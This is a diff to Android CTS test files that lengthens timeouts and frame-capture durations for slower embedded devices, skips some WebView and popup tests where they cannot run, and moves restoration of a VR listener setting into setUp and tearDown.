index 925dd8e..ee1b921 100644
--- a/tests/tests/view/src/android/view/cts/PixelCopyViewProducerActivity.java
+++ b/tests/tests/view/src/android/view/cts/PixelCopyViewProducerActivity.java
@@ -108,7 +108,7 @@
mCurrentOrientation = (mCurrentOrientation + 1) % ORIENTATIONS.length;
setRequestedOrientation(ORIENTATIONS[mCurrentOrientation]);
});
- waitForFirstDrawCompleted(3, TimeUnit.SECONDS);
+ waitForFirstDrawCompleted(10, TimeUnit.SECONDS);
return mCurrentOrientation != 0;
}
diff --git a/tests/tests/view/src/android/view/cts/SurfaceViewSyncTest.java b/tests/tests/view/src/android/view/cts/SurfaceViewSyncTest.java
index 0f77bd7..2a14a8d 100644
--- a/tests/tests/view/src/android/view/cts/SurfaceViewSyncTest.java
+++ b/tests/tests/view/src/android/view/cts/SurfaceViewSyncTest.java
@@ -242,7 +242,7 @@
+ " incorrect frames observed - incorrect positioning",
result.failFrames == 0);
float framesPerSecond = 1.0f * result.passFrames
- / TimeUnit.MILLISECONDS.toSeconds(CapturedActivity.CAPTURE_DURATION_MS);
+ / TimeUnit.MILLISECONDS.toSeconds(mActivity.getCaptureDurationMs());
assertTrue("Error, only " + result.passFrames
+ " frames observed, virtual display only capturing at "
+ framesPerSecond + " frames per second",
diff --git a/tests/tests/view/src/android/view/cts/TextureViewCameraTest.java b/tests/tests/view/src/android/view/cts/TextureViewCameraTest.java
index b909469..63d4d5e 100644
--- a/tests/tests/view/src/android/view/cts/TextureViewCameraTest.java
+++ b/tests/tests/view/src/android/view/cts/TextureViewCameraTest.java
@@ -31,7 +31,7 @@
@LargeTest
@RunWith(AndroidJUnit4.class)
public class TextureViewCameraTest {
- private static final long WAIT_TIMEOUT_IN_SECS = 10;
+ private static final long WAIT_TIMEOUT_IN_SECS = 30;
private TextureViewCameraActivity mActivity;
private int mNumberOfCameras;
diff --git a/tests/tests/view/src/android/view/cts/TextureViewTest.java b/tests/tests/view/src/android/view/cts/TextureViewTest.java
index c771c18..d9b84a4 100644
--- a/tests/tests/view/src/android/view/cts/TextureViewTest.java
+++ b/tests/tests/view/src/android/view/cts/TextureViewTest.java
@@ -114,7 +114,7 @@
private int waitForChange(Point point, int color)
throws InterruptedException, TimeoutException {
- for (int i = 0; i < 20; i++) {
+ for (int i = 0; i < 30; i++) {
int pixel = getPixel(point);
if (pixel != color) {
return pixel;
diff --git a/tests/tests/view/src/android/view/cts/surfacevalidator/CapturedActivity.java b/tests/tests/view/src/android/view/cts/surfacevalidator/CapturedActivity.java
index cd463a3..1ff6dc5 100644
--- a/tests/tests/view/src/android/view/cts/surfacevalidator/CapturedActivity.java
+++ b/tests/tests/view/src/android/view/cts/surfacevalidator/CapturedActivity.java
@@ -57,7 +57,6 @@
}
private static final String TAG = "CapturedActivity";
- private static final long TIME_OUT_MS = 25000;
private static final int PERMISSION_CODE = 1;
private MediaProjectionManager mProjectionManager;
private MediaProjection mMediaProjection;
@@ -65,28 +64,30 @@
private SurfacePixelValidator mSurfacePixelValidator;
- public static final long CAPTURE_DURATION_MS = 10000;
private static final int PERMISSION_DIALOG_WAIT_MS = 1000;
private static final int RETRY_COUNT = 2;
private static final long START_CAPTURE_DELAY_MS = 4000;
- private static final long END_CAPTURE_DELAY_MS = START_CAPTURE_DELAY_MS + CAPTURE_DURATION_MS;
- private static final long END_DELAY_MS = END_CAPTURE_DELAY_MS + 1000;
private MediaPlayer mMediaPlayer;
private final Handler mHandler = new Handler(Looper.getMainLooper());
+ private volatile boolean mOnEmbedded;
private volatile boolean mOnWatch;
private CountDownLatch mCountDownLatch;
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
- mOnWatch = getPackageManager().hasSystemFeature(PackageManager.FEATURE_WATCH);
+ final PackageManager packageManager = getPackageManager();
+ mOnWatch = packageManager.hasSystemFeature(PackageManager.FEATURE_WATCH);
if (mOnWatch) {
// Don't try and set up test/capture infrastructure - they're not supported
return;
}
+ // Embedded devices are significantly slower, and are given
+ // longer duration to capture the expected number of frames
+ mOnEmbedded = packageManager.hasSystemFeature(PackageManager.FEATURE_EMBEDDED);
getWindow().getDecorView().setSystemUiVisibility(
View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_FULLSCREEN);
@@ -150,6 +151,10 @@
mCountDownLatch.countDown();
}
+ public long getCaptureDurationMs() {
+ return mOnEmbedded ? 100000 : 10000;
+ }
+
public TestResult runTest(AnimationTestCase animationTestCase) throws Throwable {
TestResult testResult = new TestResult();
if (mOnWatch) {
@@ -165,6 +170,10 @@
return testResult;
}
+ final long timeOutMs = mOnEmbedded ? 125000 : 25000;
+ final long endCaptureDelayMs = START_CAPTURE_DELAY_MS + getCaptureDurationMs();
+ final long endDelayMs = endCaptureDelayMs + 1000;
+
int count = 0;
// Sometimes system decides to rotate the permission activity to another orientation
// right after showing it. This results in: uiautomation thinks that accept button appears,
@@ -175,7 +184,7 @@
assertTrue("Can't get the permission", count <= RETRY_COUNT);
dismissPermissionDialog();
count++;
- } while (!mCountDownLatch.await(TIME_OUT_MS, TimeUnit.MILLISECONDS));
+ } while (!mCountDownLatch.await(timeOutMs, TimeUnit.MILLISECONDS));
mHandler.post(() -> {
Log.d(TAG, "Setting up test case");
@@ -215,7 +224,7 @@
Log.d(TAG, "Stopping capture");
mVirtualDisplay.release();
mVirtualDisplay = null;
- }, END_CAPTURE_DELAY_MS);
+ }, endCaptureDelayMs);
final CountDownLatch latch = new CountDownLatch(1);
mHandler.postDelayed(() -> {
@@ -224,9 +233,9 @@
mSurfacePixelValidator.finish(testResult);
latch.countDown();
mSurfacePixelValidator = null;
- }, END_DELAY_MS);
+ }, endDelayMs);
- boolean latchResult = latch.await(TIME_OUT_MS, TimeUnit.MILLISECONDS);
+ boolean latchResult = latch.await(timeOutMs, TimeUnit.MILLISECONDS);
if (!latchResult) {
testResult.passFrames = 0;
testResult.failFrames = 1000;
diff --git a/tests/tests/webkit/src/android/webkit/cts/WebViewTest.java b/tests/tests/webkit/src/android/webkit/cts/WebViewTest.java
index b4be068..c1736db 100755
--- a/tests/tests/webkit/src/android/webkit/cts/WebViewTest.java
+++ b/tests/tests/webkit/src/android/webkit/cts/WebViewTest.java
@@ -2622,6 +2622,10 @@
}
public void testSetSafeBrowsingWhitelistWithMalformedList() throws Exception {
+ if (!NullWebViewUtils.isWebViewAvailable()) {
+ return;
+ }
+
List whitelist = new ArrayList<String>();
// Protocols are not supported in the whitelist
whitelist.add("http://google.com");
@@ -2637,6 +2641,10 @@
}
public void testSetSafeBrowsingWhitelistWithValidList() throws Exception {
+ if (!NullWebViewUtils.isWebViewAvailable()) {
+ return;
+ }
+
List whitelist = new ArrayList<String>();
whitelist.add("safe-browsing");
final CountDownLatch resultLatch = new CountDownLatch(1);
@@ -2756,6 +2764,10 @@
}
public void testStartSafeBrowsingUseApplicationContext() throws Exception {
+ if (!NullWebViewUtils.isWebViewAvailable()) {
+ return;
+ }
+
final MockContext ctx = new MockContext(getActivity());
final CountDownLatch resultLatch = new CountDownLatch(1);
WebView.startSafeBrowsing(ctx, new ValueCallback<Boolean>() {
diff --git a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
index a9b5a13..330a92a 100644
--- a/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
+++ b/tests/tests/widget/src/android/widget/cts/PopupWindowTest.java
@@ -47,6 +47,7 @@
import android.transition.Transition.TransitionListener;
import android.transition.TransitionValues;
import android.util.AttributeSet;
+import android.util.DisplayMetrics;
import android.view.Display;
import android.view.Gravity;
import android.view.MotionEvent;
@@ -1426,6 +1427,16 @@
@Test
public void testAnchorInPopup() throws Throwable {
+ DisplayMetrics displayMetrics = mActivity.getResources().getDisplayMetrics();
+ float dpWidth = displayMetrics.widthPixels / displayMetrics.density;
+ float dpHeight = displayMetrics.heightPixels / displayMetrics.density;
+ final int minDisplaySize = 320;
+ if (dpWidth < minDisplaySize || dpHeight < minDisplaySize) {
+ // On smaller screens the popups that this test is creating
+ // are not guaranteed to be properly aligned to their anchors.
+ return;
+ }
+
mPopupWindow = createPopupWindow(
mActivity.getLayoutInflater().inflate(R.layout.popup_window, null));
diff --git a/tests/vr/src/android/vr/cts/VrSetFIFOThreadTest.java b/tests/vr/src/android/vr/cts/VrSetFIFOThreadTest.java
index 9e010fa..9fd01b1 100644
--- a/tests/vr/src/android/vr/cts/VrSetFIFOThreadTest.java
+++ b/tests/vr/src/android/vr/cts/VrSetFIFOThreadTest.java
@@ -33,6 +33,7 @@
private OpenGLESActivity mActivity;
private ActivityManager mActivityManager;
private Context mContext;
+ private String mOldVrListener;
private static final int SCHED_OTHER = 0;
private static final int SCHED_FIFO = 1;
private static final int SCHED_RESET_ON_FORK = 0x40000000;
@@ -43,6 +44,20 @@
super(OpenGLESActivity.class);
}
+ @Override
+ public void setUp() throws Exception {
+ super.setUp();
+ mContext = getInstrumentation().getTargetContext();
+ mOldVrListener = Settings.Secure.getString(mContext.getContentResolver(), ENABLED_VR_LISTENERS);
+ }
+
+ @Override
+ public void tearDown() throws Exception {
+ Settings.Secure.putString(mContext.getContentResolver(),
+ ENABLED_VR_LISTENERS, mOldVrListener);
+ super.tearDown();
+ }
+
private void setIntent(int viewIndex, int createProtected,
int priorityAttribute, int mutableAttribute) {
Intent intent = new Intent();
@@ -54,10 +69,8 @@
}
public void testSetVrThreadAPISuccess() throws Throwable {
- mContext = getInstrumentation().getTargetContext();
setIntent(OpenGLESActivity.RENDERER_BASIC, 1, 0, 0);
ComponentName requestedComponent = new ComponentName(mContext, MockVrListenerService.class);
- String old_vr_listener = Settings.Secure.getString(mContext.getContentResolver(), ENABLED_VR_LISTENERS);
Settings.Secure.putString(mContext.getContentResolver(),
ENABLED_VR_LISTENERS,
requestedComponent.flattenToString());
@@ -76,15 +89,11 @@
Log.e(TAG, "scheduling policy: " + policy);
assertEquals((SCHED_FIFO | SCHED_RESET_ON_FORK), policy);
}
- Settings.Secure.putString(mContext.getContentResolver(),
- ENABLED_VR_LISTENERS, old_vr_listener);
}
public void testSetVrThreadAPIFailure() throws Throwable {
- mContext = getInstrumentation().getTargetContext();
setIntent(OpenGLESActivity.RENDERER_BASIC, 1, 0, 0);
ComponentName requestedComponent = new ComponentName(mContext, MockVrListenerService.class);
- String old_vr_listener = Settings.Secure.getString(mContext.getContentResolver(), ENABLED_VR_LISTENERS);
Settings.Secure.putString(mContext.getContentResolver(),
ENABLED_VR_LISTENERS,
requestedComponent.flattenToString());
@@ -102,7 +111,5 @@
Log.e(TAG, "scheduling policy: " + policy);
assertEquals(SCHED_OTHER, policy);
}
- Settings.Secure.putString(mContext.getContentResolver(),
- ENABLED_VR_LISTENERS, old_vr_listener);
}
}